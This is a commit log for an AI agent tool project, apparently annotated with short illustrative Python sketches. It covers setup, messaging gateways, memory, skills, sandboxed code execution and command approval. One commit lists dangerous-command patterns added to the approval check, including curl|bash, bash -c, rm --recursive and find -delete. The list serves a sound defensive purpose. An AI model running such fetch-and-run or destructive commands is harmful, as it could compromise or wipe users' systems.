- Added logic to download and extract the appropriate Node.js binary based on the system architecture and OS.
- Updated the installation script to handle missing dependencies like ripgrep and ffmpeg, providing installation prompts for macOS users.
2026-02-23 23:18:13 +00:00
Teknium
b3bf21db56 refactor: update environment variable configuration and add multi-select checklist for tool setup
- Cleared the REQUIRED_ENV_VARS dictionary as no single environment variable is universally required.
- Enhanced the OPTIONAL_ENV_VARS with improved descriptions and added advanced options for better user guidance.
- Introduced a new prompt_checklist function to allow users to select tools during setup, improving the configuration experience.
- Updated the setup wizard to handle missing optional environment variables using the new checklist, streamlining the tool configuration process.
2026-02-23 23:06:47 +00:00
teknium1
674a6f96d3 feat: unify set-home command naming across platforms
- Updated the command name from `/set-home` to `/sethome` in the GatewayRunner class for consistency.
- Added a new slash command `/sethome` in the Discord adapter to set the home channel.
- Registered the `/sethome` command in the Telegram adapter to align with the updated naming convention.
2026-02-23 15:01:22 -08:00
teknium1
79f8831738 refactor: improve message source tagging in GatewayRunner
- Renamed variable `source` to `mirror_src` for clarity in the message tagging logic within the GatewayRunner class, enhancing code readability while maintaining functionality.
2026-02-23 14:58:52 -08:00
teknium1
224c900532 refactor: update session loading method in SessionStore
- Replaced the call to `_load()` with `_ensure_loaded()` in the `has_any_sessions` method to improve clarity and ensure that session data is properly initialized before checking for existing sessions.
2026-02-23 14:56:48 -08:00
teknium1
4f9f5f70e3 fix: handle missing toolset IDs in welcome banner
- Updated the toolset ID retrieval logic in the build_welcome_banner function to use a fallback to the toolset name if the ID is not present, ensuring robustness in displaying unavailable toolsets.
2026-02-23 14:55:53 -08:00
Teknium
38db6e9366 fix: correct toolset ID mapping in welcome banner
- Updated the mapping of unavailable toolsets in the welcome banner from using the internal toolset ID to the toolset name for improved clarity and accuracy in display.
2026-02-23 22:32:34 +00:00
teknium1
d18c753b3c refactor: streamline scratchpad handling in AIAgent
- Removed static methods for converting and checking <REASONING_SCRATCHPAD> tags, simplifying the codebase.
- Replaced calls to the removed methods with direct function calls for better clarity and maintainability.
- Updated trajectory saving logic to utilize a dedicated function for improved organization and readability.
2026-02-23 09:55:09 -08:00
teknium1
8fedbf87d9 feat: add cleanup utility for test artifacts in checkpoint resumption tests
- Introduced a new `_cleanup_test_artifacts` function to remove test-generated files and directories after test execution.
- Integrated the cleanup function into the `test_current_implementation` and `test_interruption_and_resume` tests to ensure proper resource management and prevent clutter from leftover files.
2026-02-23 02:16:10 -08:00
teknium1
d8a369e194 refactor: update API key checks in WebToolsTester
- Replaced the Nous API key check with the Auxiliary Model check in the WebToolsTester class.
- Updated the environment configuration to reflect the change in API key validation, ensuring accurate reporting of available keys.
2026-02-23 02:13:33 -08:00
teknium1
90af34bc83 feat: enhance interrupt handling and container resource configuration
- Introduced a shared interrupt signaling mechanism to allow tools to check for user interrupts during long-running operations.
- Updated the AIAgent to handle interrupts more effectively, ensuring in-progress tool calls are canceled and multiple interrupt messages are combined into one prompt.
- Enhanced the CLI configuration to include container resource limits (CPU, memory, disk) and persistence options for Docker, Singularity, and Modal environments.
- Improved documentation to clarify interrupt behaviors and container resource settings, providing users with better guidance on configuration and usage.
2026-02-23 02:11:33 -08:00
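A shared interrupt signal like the one described above is commonly a module-level threading.Event that long-running tools poll between units of work; a sketch under that assumption:

    import threading

    _interrupt = threading.Event()

    def request_interrupt() -> None:
        """Called from the input side when the user asks to interrupt."""
        _interrupt.set()

    def interrupted() -> bool:
        """Tools poll this between steps of long-running operations."""
        return _interrupt.is_set()

    def clear_interrupt() -> None:
        _interrupt.clear()

    # Inside a long-running tool loop:
    #     if interrupted():
    #         raise KeyboardInterrupt("user interrupt")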
teknium1
c7857dc1d4 feat: enhance AIAgent's tool usage nudges and content handling
- Introduced a method to strip <think> blocks from content so only the visible response text is handled.
- Implemented counters to reset nudge intervals when memory and skill tools are used, enhancing user guidance.
- Captured content from turns with tool calls to provide fallback responses, ensuring continuity in conversation.
- Updated nudge logic to remind users about saving memories and creating skills based on interaction patterns.
2026-02-22 21:33:28 -08:00
teknium1
08e4dc2563 feat: implement channel directory and message mirroring for cross-platform communication
- Introduced a new channel directory to cache reachable channels/contacts for messaging platforms, enhancing the send_message tool's ability to resolve human-friendly names to numeric IDs.
- Added functionality to mirror sent messages into the target's session transcript, providing context for cross-platform message delivery.
- Updated the send_message tool to support listing available targets and improved error handling for channel resolution.
- Enhanced the gateway to build and refresh the channel directory during startup and at regular intervals, ensuring up-to-date channel information.
2026-02-22 20:44:15 -08:00
teknium1
92447141d9 feat: integrate config.yaml values into environment for enhanced flexibility
- Added functionality to load values from config.yaml into the environment, allowing os.getenv() to access them.
- Ensured that existing environment variables take precedence over config values.
- Updated DiscordAdapter to resolve usernames in DISCORD_ALLOWED_USERS to numeric IDs, improving user authorization checks.
- Enhanced event handling to provide clearer logging and ensure proper synchronization of slash commands.
2026-02-22 17:35:45 -08:00
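Precedence is the key detail: using os.environ.setdefault makes real environment variables win over file values. A sketch assuming flat scalar keys in config.yaml:

    import os
    import yaml

    def load_config_into_env(path: str = "config.yaml") -> None:
        """Expose config.yaml values through os.getenv() without clobbering the environment."""
        with open(path, encoding="utf-8") as fh:
            config = yaml.safe_load(fh) or {}
        for key, value in config.items():
            if isinstance(value, (str, int, float, bool)):
                # setdefault: an existing environment variable always takes precedence.
                os.environ.setdefault(str(key), str(value))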
teknium1
e0ed44388f fix: improve error messaging for chat ID and home channel configuration
- Enhanced warning in `_deliver_result` to provide clearer instructions for setting the home channel.
- Updated error message in `send_message_tool` to specify how to set a home channel when no chat ID is provided, improving user guidance.
2026-02-22 17:28:52 -08:00
teknium1
16d0aa7b4d feat: enhance job delivery mechanism in scheduler
- Introduced a new `_deliver_result` function to handle job output delivery to specified platforms.
- Added origin resolution logic to determine the correct delivery target based on job configuration.
- Updated `run_job` to return the final response along with the output for improved context.
- Integrated delivery of job results to the origin chat or fallback channels, with error handling for delivery failures.
- Cleaned up environment variables after job execution to prevent leakage between jobs.
2026-02-22 17:14:44 -08:00
teknium1
6037b6a5ab Fix session saving to DB so the full conversation history is persisted, not just user/assistant messages without tool calls 2026-02-22 17:10:24 -08:00
teknium1
e1604b2b4a feat: enhance user authorization checks in GatewayRunner
- Updated the authorization logic to include a per-platform allow-all flag for improved flexibility.
- Revised the order of checks to prioritize platform-specific allow-all settings, followed by environment variable allowlists and DM pairing approvals.
- Added global allow-all configuration for broader access control.
- Improved handling of allowlists by stripping whitespace and ensuring valid entries are processed.
2026-02-22 16:32:08 -08:00
teknium1
db23f51bc6 feat: introduce skills management features in AIAgent and CLI
- Added skills configuration options in cli-config.yaml.example, including a nudge interval for skill creation reminders.
- Implemented skills guidance in AIAgent to prompt users to save reusable workflows after complex tasks.
- Enhanced skills indexing in the prompt builder to include descriptions from SKILL.md files for better context.
- Updated the agent's behavior to periodically remind users about potential skills during tool-calling iterations.
2026-02-22 13:28:13 -08:00
teknium1
3c6750f37b feat: enhance memory management features in AIAgent and CLI
- Added configuration options for memory nudge interval and flush minimum turns in cli-config.yaml.example.
- Implemented memory flushing before conversation reset, clearing, and exit in the CLI to ensure memories are saved.
- Introduced a flush_memories method in AIAgent to handle memory persistence before context loss.
- Added periodic nudges to remind the agent to consider saving memories based on user interactions.
2026-02-22 10:15:17 -08:00
teknium1
df2ec585f1 fix: clarify MEMORY_GUIDANCE phrasing
- Updated the MEMORY_GUIDANCE text to improve clarity by rephrasing the usage instructions for the memory tool, emphasizing its diary-like functionality.
2026-02-22 02:41:27 -08:00
teknium1
250b2ca01a fix: update MEMORY_GUIDANCE for clarity
- Revised the MEMORY_GUIDANCE text to enhance clarity by adjusting the phrasing for better user understanding of memory tool usage.
2026-02-22 02:40:16 -08:00
teknium1
c2d5f7bf26 feat: add timestamp formatting function for session metadata
- Introduced a new `_format_timestamp` function to convert Unix timestamps and ISO strings into a human-readable date format.
- Updated the session metadata handling to use the new formatting function for improved clarity in session start dates.
- Adjusted the output structure to reflect the change from "Session started" to "Session date" for better user understanding.
2026-02-22 02:37:26 -08:00
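A sketch of a dual-format helper like the one described, accepting either a Unix epoch number or an ISO-8601 string; the output format is illustrative:

    from datetime import datetime

    def _format_timestamp(value) -> str:
        """Render a Unix timestamp or ISO-8601 string as a human-readable date."""
        if isinstance(value, (int, float)):
            dt = datetime.fromtimestamp(value)
        else:
            # fromisoformat handles "2026-02-22T02:37:26" style strings.
            dt = datetime.fromisoformat(str(value))
        return dt.strftime("%Y-%m-%d %H:%M")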
teknium1
e223b4ac09 Enhance agent guidance with memory and session search tools
- Introduced MEMORY_GUIDANCE and SESSION_SEARCH_GUIDANCE to improve agent's contextual awareness and proactive assistance.
- Updated AIAgent to conditionally include tool-aware guidance in prompts based on available tools.
- Enhanced descriptions in memory and session search schemas for clearer user instructions on when to utilize these features.
2026-02-22 02:31:52 -08:00
teknium1
f072801f38 refactor: remove unused compression model variable in AIAgent
- Eliminated the `compression_model` variable from the AIAgent class, as it was not being utilized.
- Cleaned up the context compressor initialization for improved clarity and maintainability.
2026-02-22 02:17:33 -08:00
teknium1
ededaaa874 Hermes Agent UX Improvements 2026-02-22 02:16:11 -08:00
teknium1
b1f55e3ee5 refactor: reorganize agent and CLI structure for improved clarity
- Extracted agent internals into a dedicated `agent/` directory, including model metadata, context compression, and prompt handling.
- Enhanced CLI structure by separating banner, commands, and callbacks into distinct modules within `hermes_cli/`.
- Updated README to reflect the new directory organization and clarify the purpose of each component.
- Improved tool registration and terminal execution backends for better maintainability and usability.
2026-02-21 23:17:18 -08:00
teknium1
51b95236f9 refactor: move model metadata functions to agent/model_metadata.py
- Relocated functions related to model metadata, including fetch_model_metadata, get_model_context_length, estimate_tokens_rough, and estimate_messages_tokens_rough, to agent/model_metadata.py for better organization and maintainability.
- Updated imports in run_agent.py to reflect the new location of these functions.
2026-02-21 22:34:18 -08:00
teknium1
9123cfb5dd Refactor Terminal and AIAgent cleanup 2026-02-21 22:31:43 -08:00
teknium1
9018e9dd70 refactor: update tool registration and documentation
- Enhanced tool registration process by implementing a self-registering mechanism in each tool file via `tools/registry.py`.
- Updated `model_tools.py` to serve as a thin orchestration layer, simplifying tool discovery and registration.
- Revised documentation to clarify the steps for adding new tools, emphasizing the importance of schema, handler, and registration consistency.
- Improved dependency resolution in environments by ensuring toolsets are queried from `tools/registry.py`.
2026-02-21 21:03:40 -08:00
teknium1
08ff1c1aa8 More major refactor/tech debt removal! 2026-02-21 20:22:33 -08:00
teknium1
6134939882 refactor: deduplicate toolsets, unify async bridging, fix approval race condition, harden security
- Replace 4 copy-pasted messaging platform toolsets with shared _HERMES_CORE_TOOLS list
- Consolidate 5 ad-hoc async-bridging patterns into single _run_async() in model_tools.py
  - Removes deprecated get_event_loop()/set_event_loop() calls
  - Makes all tool handlers self-protecting regardless of caller's event loop state
  - RL handler refactored from if/elif chain to dispatch dict
- Fix exec approval race condition: replace module-level globals with thread-safe
  per-session tools/approval.py (submit_pending, pop_pending, approve_session, is_approved)
  - Session A approving "rm" no longer approves it for all other sessions
- Fix config deep merge: user overriding tts.elevenlabs.voice_id no longer clobbers
  tts.elevenlabs.model_id; migration detection now recurses to arbitrary depth
- Gateway default-deny: unauthenticated users denied unless GATEWAY_ALLOW_ALL_USERS=true
- Add 10 dangerous command patterns, including: rm --recursive, bash -c, python -e,
  curl|bash, xargs rm, find -delete
- Sanitize gateway error messages: users see generic message, full traceback goes to logs
2026-02-21 18:28:49 -08:00
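The per-session approval store can be a dict guarded by a single lock, keyed by session id, exposing the four operations named above; a sketch, not the repository's actual module:

    import threading

    _lock = threading.Lock()
    _pending = {}   # session_id -> command awaiting approval
    _approved = {}  # session_id -> set of commands approved for that session only

    def submit_pending(session_id: str, command: str) -> None:
        with _lock:
            _pending[session_id] = command

    def pop_pending(session_id: str):
        with _lock:
            return _pending.pop(session_id, None)

    def approve_session(session_id: str, command: str) -> None:
        with _lock:
            _approved.setdefault(session_id, set()).add(command)

    def is_approved(session_id: str, command: str) -> bool:
        with _lock:
            # Session A approving "rm" never approves it for session B.
            return command in _approved.get(session_id, set())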
teknium1
7cb6427dea refactor: streamline cron job handling and update CLI commands
- Removed legacy cron daemon functionality, integrating cron job execution directly into the gateway process for improved efficiency.
- Updated CLI commands to reflect changes, replacing `hermes cron daemon` with `hermes cron status` and enhancing documentation for cron job management.
- Clarified messaging in the README and other documentation regarding the gateway's role in managing cron jobs.
- Removed obsolete terminal_hecate tool and related configurations to simplify the codebase.
2026-02-21 16:21:19 -08:00
teknium1
79b62497d1 enable cronjobs in messaging platforms 2026-02-21 12:46:18 -08:00
teknium1
0729ef7353 fix: refine environment creation condition in terminal_tool
- Updated the environment creation condition to specifically check for "singularity" instead of allowing "local", ensuring more precise handling of environment types during task execution.
2026-02-21 12:43:56 -08:00
teknium1
8f6788474b feat: enhance logging in AIAgent for quiet mode
- Added functionality to suppress logging noise from specific modules when in quiet mode, improving user experience in CLI.
- Updated terminal_tool.py to change the log level for fallback directory usage from warning to debug, providing clearer context without cluttering logs.
2026-02-21 12:41:05 -08:00
teknium1
5c2926102b fix: improve placeholder handling and hint height in CLI
- Updated the placeholder text logic to append new fragments after existing ones, preserving the prompt appearance.
- Adjusted the hint height to maintain a 1-line spacer while the agent is running, preventing output from crowding the input area.
2026-02-21 12:36:14 -08:00
teknium1
bff37075f6 feat: enhance CLI input handling with password masking and placeholder text
- Added input processors for password masking during sudo prompts and inline placeholder text for various states in the CLI.
- Implemented a custom placeholder processor to display context-sensitive instructions based on the current state (e.g., sudo, approval, clarify).
- Updated hint text logic to improve user guidance during interactive prompts, enhancing overall user experience.
2026-02-21 12:33:48 -08:00
teknium1
c98ee98525 feat: implement interactive prompts for sudo password and command approval in CLI
- Added methods for handling sudo password and dangerous command approval prompts using a callback mechanism in cli.py.
- Integrated these prompts with the prompt_toolkit UI for improved user experience.
- Updated terminal_tool.py to support callback registration for interactive prompts, enhancing the CLI's interactivity.
- Introduced a background thread for API calls in run_agent.py to allow for interrupt handling during long-running operations.
- Enhanced error handling for interrupted API calls, ensuring graceful degradation of user experience.
2026-02-21 12:15:40 -08:00
teknium1
ecb430effe refactor: enhance API interaction and message handling in AIAgent
- Introduced new methods in run_agent.py for building API keyword arguments and normalizing assistant messages from API responses.
- Added functionality for compressing conversation context and managing session state in SQLite.
- Improved tool call execution handling, including enhanced logging and error management.
- Updated path handling in multiple platform files to utilize pathlib for better compatibility and readability.
2026-02-21 04:17:27 -08:00
teknium1
7ee7221af1 refactor: consolidate debug logging across tools with shared DebugSession class
- Introduced a new DebugSession class in tools/debug_helpers.py to centralize debug logging functionality, replacing duplicated code across various tool modules.
- Updated image_generation_tool.py, mixture_of_agents_tool.py, vision_tools.py, web_tools.py, and others to utilize the new DebugSession for logging tool calls and saving debug logs.
- Enhanced maintainability and consistency in debug logging practices across the codebase.
2026-02-21 03:53:24 -08:00
teknium1
748fd3db88 refactor: enhance error handling with structured logging across multiple modules
- Updated various modules including cli.py, run_agent.py, gateway, and tools to replace silent exception handling with structured logging.
- Improved error messages to provide more context, aiding in debugging and monitoring.
- Ensured consistent logging practices throughout the codebase, enhancing traceability and maintainability.
2026-02-21 03:32:11 -08:00
teknium1
cbff1b818c refactor: remove obsolete Nous API test scripts
- Deleted test scripts for Nous API limits, patterns, and temperature checks to streamline the testing suite.
- These scripts were no longer necessary and their removal helps maintain a cleaner codebase.
2026-02-21 03:21:13 -08:00
teknium1
a885d2f240 refactor: implement structured logging across multiple modules
- Introduced logging functionality in cli.py, run_agent.py, scheduler.py, and various tool modules to replace print statements with structured logging.
- Enhanced error handling and informational messages to improve debugging and monitoring capabilities.
- Ensured consistent logging practices across the codebase, facilitating better traceability and maintenance.
2026-02-21 03:11:11 -08:00
teknium1
b6247b71b5 refactor: update tool descriptions for clarity and conciseness
- Revised descriptions for various tools in model_tools.py, browser_tool.py, code_execution_tool.py, delegate_tool.py, and terminal_tool.py to enhance clarity and reduce verbosity.
- Improved consistency in terminology and formatting across tool descriptions, ensuring users have a clearer understanding of tool functionalities and usage.
2026-02-21 02:41:30 -08:00
teknium1
3555c6173d refactor: remove temporary API payload logging and enhance session log structure
- Eliminated the `_log_api_payload` method used for temporary debugging, streamlining the codebase.
- Updated the `_save_session_log` method to save the full raw session, including all messages and metadata, improving the clarity and completeness of session logs.
- Adjusted session log entry to include additional context such as `base_url` and `platform` for better tracking.
2026-02-21 01:26:37 -08:00
teknium1
3976962621 fix: update session logging directory path in README and code
- Changed the session logging directory from `~/.hermes-agent/logs/` to `~/.hermes/sessions/` for consistency.
- Updated the `run_agent.py` to reflect the new logging path, ensuring session logs are stored correctly alongside gateway sessions.
2026-02-21 01:20:18 -08:00
teknium1
a54a27595b fix: update browser command connection instructions to prevent session conflicts
- Clarified the usage of the --cdp flag when connecting to an existing Browserbase session.
- Emphasized the importance of not using --session with --cdp to avoid creating a local browser instance in agent-browser >=0.13.
- Updated comments to reflect changes in per-task isolation management with AGENT_BROWSER_SOCKET_DIR.
2026-02-21 00:54:01 -08:00
teknium1
7283b9f6cf feat: extend browser session management with improved thread safety and timeout configuration
- Increased the default session inactivity timeout from 2 to 5 minutes to accommodate LLM reasoning during multi-step tasks.
- Enhanced thread safety by implementing locks around session activity tracking and cleanup processes, allowing concurrent access by multiple subagents.
- Removed the stale daemon cleanup function, as it is no longer necessary with the updated session management approach.
- Updated logging and session cleanup logic to ensure proper handling of active sessions and associated resources.
2026-02-21 00:44:25 -08:00
teknium1
3dfc0a9679 feat: add PPTX editing and creation skills with comprehensive documentation
- Introduced new skills for editing and creating PPTX presentations, including a detailed guide on template-based workflows and script usage.
- Added scripts for slide management, cleaning, and packing PPTX files, enhancing the overall functionality for users.
- Included a LICENSE file to clarify usage rights and restrictions.
- Created a SKILL.md file to provide an overview and quick reference for PPTX-related tasks.
- Documented various formatting rules, common pitfalls, and design ideas to improve presentation quality.
2026-02-21 00:32:26 -08:00
teknium1
6903c4605c chore: update package-lock.json with new dependencies and version upgrades
- Upgraded the agent-browser dependency to version 0.13.0.
- Added multiple new dependencies including @appium/logger, @wdio/config, and others, along with their respective versions and licenses.
- Updated the integrity checks and resolved URLs for the new packages.
- Ensured compatibility with Node.js versions by specifying engine requirements for new dependencies.
2026-02-21 00:32:26 -08:00
teknium1
5b3f708fcb feat: enhance stale daemon cleanup and improve error logging in browser tool
- Updated the stale daemon cleanup function to support multiple patterns for identifying orphaned agent-browser processes, improving reliability across different versions.
- Added logging for stderr output during browser command execution to aid in diagnostics, particularly for capturing warnings from the agent-browser.
- Implemented a warning for empty snapshots returned from the agent-browser, indicating potential issues with stale daemons or CDP connections.
2026-02-21 00:27:35 -08:00
teknium1
b33ed9176f feat: update database schema and enhance message persistence
- Incremented schema version to 2 and added a new column `finish_reason` to the `messages` table.
- Implemented a method to flush un-logged messages to the session database, ensuring data integrity during conversation interruptions.
- Enhanced error handling to persist messages in various early-return scenarios, preventing data loss.
2026-02-21 00:05:39 -08:00
teknium1
c48817f69b chore: update agent-browser dependency and clean up stale daemon processes
- Upgraded the agent-browser dependency from version 0.7.6 to 0.13.0 in package.json.
- Added functionality to kill stale agent-browser daemon processes in browser_tool.py to prevent orphaned instances from previous runs.
2026-02-20 23:40:42 -08:00
teknium1
70dd3a16dc Cleanup time! 2026-02-20 23:23:32 -08:00
teknium1
9a19fe1f50 chore: remove deprecated session viewer and exported data files
- Deleted the session_viewer.html file, which was no longer in use.
- Removed the exprted.jsonl file, as it contained outdated exported data that is no longer relevant to the current project structure.
2026-02-20 23:02:02 -08:00
teknium1
3961f8e7a4 refactor: update README for improved clarity on provider setup and switching
- Revised the "Getting Started" section to clarify the installation process with `hermes setup`.
- Enhanced instructions for changing providers and models using the `hermes model` command.
- Streamlined the explanation of available provider options, including Nous Portal, OpenRouter, and custom endpoints.
2026-02-20 21:31:45 -08:00
teknium1
fc37b17b1f feat: simplify README instructions for connecting to LLM providers
- Streamlined the "Getting Started" section to focus on connecting to the Nous Portal.
- Removed detailed options for other providers, emphasizing the quickest setup method.
- Clarified the process for switching providers and models using the `hermes model` command.
2026-02-20 21:28:06 -08:00
teknium1
630bd3d789 feat: improve password prompt handling in terminal tool
- Replaced getpass with direct reading from /dev/tty so passwords are read without being echoed.
- Updated threading logic for password input to ensure proper cleanup and error handling.
- Improved visual feedback during password prompt, including clearer separation and timeout messaging.
- Enhanced user experience by providing immediate feedback on password input status.
2026-02-20 21:26:31 -08:00
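Reading from /dev/tty with echoing disabled typically goes through termios; a sketch of just the no-echo read, independent of the threading and timeout plumbing in the commit above:

    import termios

    def read_password_from_tty(prompt: str = "Password: ") -> str:
        """Read one line from the controlling terminal without echoing it."""
        with open("/dev/tty", "r+") as tty:
            tty.write(prompt)
            tty.flush()
            fd = tty.fileno()
            old = termios.tcgetattr(fd)
            new = old[:]
            new[3] = new[3] & ~termios.ECHO  # lflags: turn echo off
            try:
                termios.tcsetattr(fd, termios.TCSADRAIN, new)
                line = tty.readline()
            finally:
                termios.tcsetattr(fd, termios.TCSADRAIN, old)
                tty.write("\n")
        return line.rstrip("\n")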
teknium1
5c4c0c0cba feat: update branding and visuals across the project
- Updated the README to include a new banner image and changed the title emoji from 🦋 to ⚕.
- Modified various CLI outputs and scripts to reflect the new branding, ensuring consistency in the use of the ⚕ emoji.
- Added a new banner image asset for enhanced visual appeal during installation and setup processes.
2026-02-20 21:25:04 -08:00
teknium1
24c241d29b add github project management skill 2026-02-20 21:15:17 -08:00
teknium1
a3d760ff12 feat: implement provider deactivation and enhance configuration updates
- Added a new function to deactivate the active provider without deleting credentials, facilitating smoother transitions between different provider types.
- Updated the model flow logic to ensure the active provider is correctly set in the configuration, including handling custom endpoints and OAuth providers.
- Improved error handling in the CLI to consistently format authentication error messages.
- Enhanced the model selection process to reflect the effective provider based on configuration and environment variables.
2026-02-20 18:17:55 -08:00
teknium1
77a3dda59d feat: enhance README and CLI with multi-provider model selection
- Added a comprehensive "Getting Started" section in the README to guide users through selecting inference providers.
- Implemented an interactive model selection feature in the CLI, allowing users to choose from available models or enter a custom model name.
- Improved user experience by displaying the current model and active provider during selection, with clear instructions for each provider type.
- Updated the model selection process to prioritize the currently active model, enhancing usability and clarity.
2026-02-20 17:52:46 -08:00
teknium1
f6daceb449 feat: add interactive model selection and saving functionality
- Implemented a new interactive model selection feature after user login, allowing users to choose from available models or enter a custom model name.
- Added functionality to save the selected model to the configuration file and environment variables, ensuring persistence across sessions.
- Enhanced user experience by providing both menu-based and fallback number-based selection methods for model choice.
2026-02-20 17:35:12 -08:00
teknium1
cfef34f7a6 feat: add multi-provider authentication and inference provider selection
- Implemented a multi-provider authentication system for the Hermes Agent, supporting OAuth for Nous Portal and traditional API key methods for OpenRouter and custom endpoints.
- Enhanced CLI with commands for logging in and out of providers, allowing users to authenticate and manage their credentials easily.
- Updated configuration options to select inference providers, with detailed documentation on usage and setup.
- Improved status reporting to include authentication status and provider details, enhancing user awareness of their current configuration.
- Added new files for authentication handling and updated existing components to integrate the new provider system.
2026-02-20 17:24:00 -08:00
teknium1
c007b9e5bd chore: update installer banner text for branding consistency
- Changed the banner message in both PowerShell and shell scripts to reflect the new branding of the Hermes Agent as an open source AI agent by Nous Research, enhancing clarity and consistency across installation scripts.
2026-02-20 11:20:59 -08:00
teknium1
b9f3518b33 refactor: streamline TODO.md for clarity and focus
- Removed outdated sections detailing existing tools and knowledge systems to enhance readability.
- Consolidated information on subagent architecture and interactive clarifying questions, emphasizing their current status and implementation details.
- Updated formatting and structure to improve navigation and understanding of the document's content.
2026-02-20 03:28:42 -08:00
teknium1
ba07d9d5e3 feat: enhance task delegation with spinner updates and progress display
- Added a spinner to visually indicate task delegation progress in quiet mode, improving user experience during batch processing.
- Implemented a method to update spinner text dynamically based on remaining tasks, providing real-time feedback.
- Enhanced the `delegate_task` function to include per-task completion messages, ensuring clarity on task status during execution.
- Updated the KawaiiSpinner class to allow message updates while running, facilitating better interaction during long-running tasks.
2026-02-20 03:23:23 -08:00
teknium1
90e5211128 feat: implement subagent delegation for task management
- Introduced the `delegate_task` tool, allowing the main agent to spawn child AIAgent instances with isolated context for complex tasks.
- Supported both single-task and batch processing (up to 3 concurrent tasks) to enhance task management capabilities.
- Updated configuration options for delegation, including maximum iterations and default toolsets for subagents.
- Enhanced documentation to provide clear guidance on using the delegation feature and its configuration.
- Added comprehensive tests to ensure the functionality and reliability of the delegation logic.
2026-02-20 03:15:53 -08:00
teknium1
c0d412a736 refactor: update search tool parameters and documentation for clarity
- Changed the target parameter from "content" and "files" to "grep" and "find" to better represent their functionality.
- Revised descriptions in the tool definitions and execution code schema to enhance understanding of search modes and output formats.
- Ensured consistency in the handling of search operations across the codebase.
2026-02-20 02:46:30 -08:00
teknium1
f9eb5edb96 refactor: rename search tool for clarity and consistency
- Updated the tool name from "search" to "search_files" across multiple files to better reflect its functionality.
- Adjusted related documentation and descriptions to ensure clarity in usage and expected behavior.
- Enhanced the toolset definitions and mappings to incorporate the new naming convention, improving overall consistency in the codebase.
2026-02-20 02:43:57 -08:00
teknium1
ba8b80a163 refactor: improve memory entry handling and file operations
- Replaced file locking with atomic file operations using temporary files to prevent race conditions during read/write.
- Added deduplication of memory and user entries to avoid exact duplicates in the memory store.
- Enhanced error handling for duplicate entries and improved logic for managing multiple matches in memory operations.
- Updated docstrings to clarify the behavior of file reading and writing methods, ensuring better understanding of the implementation.
2026-02-20 02:32:15 -08:00
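The atomic-write pattern referenced here: write to a temporary file in the same directory, then os.replace over the target, so readers never observe a half-written file. A sketch:

    import os
    import tempfile

    def atomic_write(path: str, data: str) -> None:
        """Write data to path atomically via a same-directory temp file and rename."""
        directory = os.path.dirname(os.path.abspath(path))
        fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=".tmp-")
        try:
            with os.fdopen(fd, "w", encoding="utf-8") as fh:
                fh.write(data)
                fh.flush()
                os.fsync(fh.fileno())
            os.replace(tmp_path, path)  # atomic on POSIX within one filesystem
        except BaseException:
            os.unlink(tmp_path)
            raise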
teknium1
3b90fa5c9b fix: increase default timeout for code execution sandbox
- Updated the default timeout for sandbox script execution from 120 seconds to 300 seconds (5 minutes) to allow longer-running scripts.
- Enhanced comments in the code execution tool to clarify the timeout duration.
- Suppressed stdout and stderr output from internal tool handlers during execution to prevent clutter in the CLI interface.
2026-02-20 01:29:53 -08:00
teknium1
273b367f05 fix: update documentation and return types for web tools
- Revised docstrings for `web_search` and `web_extract` functions to clarify return types and structure.
- Updated the execution code schema documentation to reflect changes in the output format for both tools, ensuring consistency and improved understanding for users.
2026-02-19 23:30:01 -08:00
teknium1
783acd712d feat: implement code execution sandbox for programmatic tool calling
- Introduced a new `execute_code` tool that allows the agent to run Python scripts that call Hermes tools via RPC, reducing the number of round trips required for tool interactions.
- Added configuration options for timeout and maximum tool calls in the sandbox environment.
- Updated the toolset definitions to include the new code execution capabilities, ensuring integration across platforms.
- Implemented comprehensive tests for the code execution sandbox, covering various scenarios including tool call limits and error handling.
- Enhanced the CLI and documentation to reflect the new functionality, providing users with clear guidance on using the code execution tool.
2026-02-19 23:23:43 -08:00
teknium1
748f0b2b5f feat: enhance clarify tool with configurable timeout and countdown display
- Added a new configuration option for the clarify tool to set a custom timeout for user responses.
- Updated the clarify callback to implement a countdown display during user interaction, improving user experience.
- Refactored timeout handling to ensure the UI remains responsive and provides feedback on remaining time.
- Enhanced hint text to include countdown information when clarify questions are active.
2026-02-19 20:11:54 -08:00
teknium1
9350e26e68 feat: introduce clarifying questions tool for interactive user engagement
- Added a new `clarify_tool` to enable the agent to ask structured multiple-choice or open-ended questions to users.
- Implemented callback functionality for user interaction, allowing the platform to handle UI presentation.
- Updated the CLI and agent to support clarify questions, including timeout handling and response management.
- Enhanced toolset definitions and requirements to include the clarify tool, ensuring availability across platforms.
2026-02-19 20:06:14 -08:00
teknium1
997f793af1 feat: update TODO.md with enhancements to skills and memory systems
- Increased the tool count to 44+ and clarified the management of bundled and agent-managed skills.
- Introduced a persistent memory system with MEMORY.md and USER.md for agent notes and user profiles.
- Updated the storage evolution section to reflect the use of SQLite for sessions and clarified the organization of skills and memories.
- Added current status of memory types implemented, highlighting progress in agent intelligence capabilities.
2026-02-19 18:47:45 -08:00
teknium1
4d5f29c74c feat: introduce skill management tool for agent-created skills and skills migration to ~/.hermes
- Added a new `skill_manager_tool` to enable agents to create, update, and delete their own skills, enhancing procedural memory capabilities.
- Updated the skills directory structure to support user-created skills in `~/.hermes/skills/`, allowing for better organization and management.
- Enhanced the CLI and documentation to reflect the new skill management functionalities, including detailed instructions on creating and modifying skills.
- Implemented a manifest-based syncing mechanism for bundled skills to ensure user modifications are preserved during updates.
2026-02-19 18:25:53 -08:00
teknium1
d070b8698d fix: escape file glob patterns in ShellFileOperations
- Updated the file glob and include filters in the ShellFileOperations class to escape shell arguments, preventing unintended shell expansion.
- Added comments to clarify the necessity of quoting for file glob patterns.
2026-02-19 15:12:02 -08:00
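In Python the standard escape is shlex.quote, which keeps a glob like *.py intact as data until rg itself interprets it; a sketch:

    import shlex

    def build_search_command(pattern: str, file_glob: str) -> str:
        # Quote both arguments so the shell never expands the glob before rg sees it.
        return f"rg --glob {shlex.quote(file_glob)} {shlex.quote(pattern)}"

    print(build_search_command("TODO", "*.py"))
    # rg --glob '*.py' TODO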
teknium1
057d3e1810 feat: enhance search functionality in ShellFileOperations
- Updated the `_search_with_rg` and `_search_with_grep` methods to include filename in the output and improve result handling.
- Adjusted result fetching to account for context lines, ensuring accurate total counts and pagination.
- Enhanced parsing logic for matches and context lines, improving the accuracy of search results.
- Refactored result slicing to maintain consistency across output modes, ensuring users receive the correct number of results.
2026-02-19 15:10:17 -08:00
teknium1
d49af633f0 feat: enhance command execution with stdin support
- Modified the `_exec` method in `ShellFileOperations` to accept `stdin_data`, allowing large content to be piped directly to commands, bypassing ARG_MAX limitations.
